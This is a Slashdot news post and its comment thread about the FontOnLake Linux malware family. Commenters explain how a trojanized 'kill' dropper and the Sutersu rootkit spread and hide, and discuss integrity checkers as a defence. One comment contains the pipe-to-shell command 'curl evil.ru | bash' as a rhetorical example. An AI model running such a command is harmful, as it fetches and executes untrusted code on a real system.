Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Security Linux

New 'FontOnLake' Malware Family Can Target Linux Systems (securityweek.com) 26

Security Week reports: A previously unknown, modular malware family that targets Linux systems has been used in targeted attacks to collect credentials and gain access to victim systems, ESET reported on Thursday. Dubbed FontOnLake, the malware family employs a rootkit to conceal its presence and uses different command and control servers for each sample, which shows how careful its operators are to maintain a low profile.

What's more, the malware developers are constantly modifying the FontOnLake modules, and use three categories of components that have been designed to work together, namely trojanized applications, backdoors, and rootkits.

Evidence suggests that FontOnLake has been used in attacks aimed at organizations in Southeast Asia. The first malware samples related to this family emerged last May. The malware was previously described by Avast and Lacework as the HCRootkit / Sutersu Linux rootkit, as well as by Tencent Security Response Center in a February report.

The various trojanized applications that ESET's researchers have identified during their investigation are used to load custom backdoor or rootkit modules, but also to collect sensitive data when needed. Posing as standard Linux utilities, these files were also designed to achieve persistence on the compromised systems. What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims. ESET's analysis of FontOnLake has revealed the use of three different backdoors, all written in C++, all using the same Asio library from Boost, and all capable of exfiltrating sshd credentials and bash command history.

The simplest of the three was designed to launch and mediate access to a local SSH server, update itself, and transmit collected credentials. The malware appears to be under development.

The second backdoor was also capable of file manipulation, updating itself, and uploading and downloading files, according to the article, while the third backdoor "accepts remote connections, serves as a proxy and can download and run Python scripts, in addition to exfiltrating credentials."
This discussion has been archived. No new comments can be posted.

New 'FontOnLake' Malware Family Can Target Linux Systems

Comments Filter:
  • It's a sign (Score:4, Funny)

    by JustAnotherOldGuy ( 4145623 ) on Sunday October 10, 2021 @12:45PM (#61877735) Journal

    It's a sign that Linux is in fact gaining some foothold on the desktop if malware authors are actually taking the time to write Linux malware.

    It's not the sign I'd like, but it's an unmistakable sign nonetheless.

    Maybe someday, god willing, we Linux users will have the same rich, full-featured malware that Windows users have available to them.

    • Maybe someday, god willing, we Linux users will have the same rich, full-featured malware that Windows users have available to them.

      Yes, god can be a dick like that.

    • It's not the first, and it's not the first time that Linux has been shown to not be invulnerable to malware; unlike what knobs like to chirp on about.

      • ...Linux has been shown to not be invulnerable to malware....

        Writing malware for Linux has never been particularly hard. Getting it to automatically spread, though, is damned hard. Social engineering is, by far, the easiest route to spread Linux malware, as human security is much more lax than Linux's security.

        • The same applies to windows and mac. social engineering is by far the most common and simple vector, spreading via the OS is damn hard and pretty rare nowadays.
  • From TFA ... (Score:4, Informative)

    by PPH ( 736903 ) on Sunday October 10, 2021 @12:57PM (#61877757)

    Posing as standard Linux utilities

    Name them.

    What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims.

    If the utilities in question were named, a smart person would have some idea as to how these came to be present on the targeted systems.

    I suspect that the compromised utilities are something that is typically run with root permissions. Possibly at startup. And are big enough hairballs of code to discourage examination by all but the bravest of souls. But since these utilities are among Those That Shall Not Be Named, we will all must wait patiently for some wizard to clean the mess up for us.

    • by goombah99 ( 560566 ) on Sunday October 10, 2021 @01:14PM (#61877797)

      All the articels one reads conflate four distinctl;y different things.

      1. An theoreatical OS vuleranility exists.
      2. There is a way to exploit this to achieve security hole X (e.g. harvesting SSH credentials)
      3. There exists a tool chain that actualizes this
      4. THere exists a mode or channel that can get this executable run on a computer.

      When the latter is "remote exploit" it's interesting. When the letter is "User installs some malware themselves with user-land credatials" it's Yawn. It gets incrementally more exciting when the malware manages a hat trick of getting more priveldges or pesistence than you'd have thought possible due to some system level bug.

    • Re:From TFA ... (Score:4, Insightful)

      by Kremmy ( 793693 ) on Sunday October 10, 2021 @01:19PM (#61877813)
      I don't know why you suspect it when you could have just read the paper they linked.
  • by fahrbot-bot ( 874524 ) on Sunday October 10, 2021 @01:12PM (#61877791)

    FontOnLake has revealed the use of three different backdoors, all written in C++ ...

    C++ is currently 4th, but may be moving up on the TIOBE index [tiobe.com] ... :-)

  • by techno-vampire ( 666512 ) on Sunday October 10, 2021 @03:16PM (#61878109) Homepage
    Are any of these infected packages available through the standard repos for their disties? If not, people would have to download them from j.random.website.com and install them manually, and if that's what they're doing, I have no sympathy for them whatsoever. In the Linux world, the standard repos exist exactly to prevent things like this.
  • Naming the utilities affected would be a nice start....

  • Actual details. (Score:5, Informative)

    by Gravis Zero ( 934156 ) on Sunday October 10, 2021 @11:45PM (#61879251)

    If you follow the links in the PDF the article links then you get to a few different sites.

    Tencent has a write up in Chinese: https://security.tencent.com/i... [tencent.com]

    I rewrote the machine translation a bit:
    Mode of Infection

    It appears the attacker first obtains access to a vulnerable server and then jumps to others by pushing the ELF dropper (kill) using scp to machines accessible through the compromised server, infiltrates, and repeats the process.

    Note: A dropper is a kind of Trojan that has been designed to "install" some sort of malware (virus, backdoor, etc.) to a target system. The malware code is contained within the dropper (single-stage) and (in this case) is compressed using UPX to evade detection by virus scanners.

    Lacework has a good overview: https://www.lacework.com/blog/... [lacework.com]

    Important snippets:

    The ELF dropper is a modified version of the coreutils “kill” binary. The majority of the “kill” binary’s core functionality remains the same, but with the addition of writing two ELF files to disk during execution. One of these components is a userland binary and the other a kernel module identified by Avast as the Sutersu rookit. Notably, figure – 0 and figure 1 show the the ELF dropper and kernel rootkit had low or non-existent detection rates on VirusTotal.

    Given the underlying backdoor coreutils utility is kill, it is not uncommon for the legitimate usage of this utility to be executed via “sudo kill” when terminating privileged processes. Executing with sudo results in appropriate permissions to both install the kernel module and write to the privileged location in /proc/.

    The kernel module as pointed out by Avast is the open-source rootkit “Sutersu” [github.com]. This rootkit has wide kernel version support, as well as supporting multiple architectures including x86, x86_64, and ARM. Sutersu supports file, port, and process hiding, as one would expect from a rootkit. Sutersu also supports functionality beyond process and file hiding in the form of additional modules that are specified during compile time.

    At the time of this writing, these additional modules include a keylogger, a module to download and execute (DLEXEC) a binary upon a given event, and an ICMP module to monitor for specific “magic bytes” before triggering an event. The DLEXC and ICMP module can be used together to trigger the downloading and execution of a binary when a specific ICMP packet is received. They also can be used independently. Lacework labs identified multiple Sutersu kernel modules with various modules and external IPs.

    • Thank you. How does this malicious kill replace the system kill in the first place? Is it installed in the user's PATH? System file?

      Specifically, are Linux machines at risk of `yum update` or at risk of `curl evil.ru | bash`?

      • Thank you. How does this malicious kill replace the system kill in the first place? Is it installed in the user's PATH? System file?

        It's pushed via scp using stolen creds (keylogger and/or auth keys) from the current server. No idea where it pushes itself but it would make sense that it pushes to a user directory since if it could push it to the system level then it wouldn't even need to bother waiting for someone to use it.

    • Installing a compromised /usr/bin/kill is just the sort of thing integrity checking programs like Tripwire and others (AIDE, OSSEC) were designed to defeat. And you can generate a list of known hashes from the signed package meta data in most distros, or generate new ones automatically when installing. Of course the original hole is a problem, but making intrusion easier to detect and harder to exploit is desirable. Tripwire is 20 year old technology, there are far better alternatives but it's straight forw

  • Including some utility names (cat, kill, sftp, sshd are named), but not much more: https://www.bleepingcomputer.c... [bleepingcomputer.com]
  • by takionya ( 7833802 ) on Monday October 11, 2021 @10:59AM (#61880397)
    a. Go to an unverified site.

    b. Download some unknown software.

    c. Run said software as root.
  • Sad, watching a once proud and respected tech form reduced to shilling for the MICROS~1 organization.

He has not acquired a fortune; the fortune has acquired him. -- Bion

Working...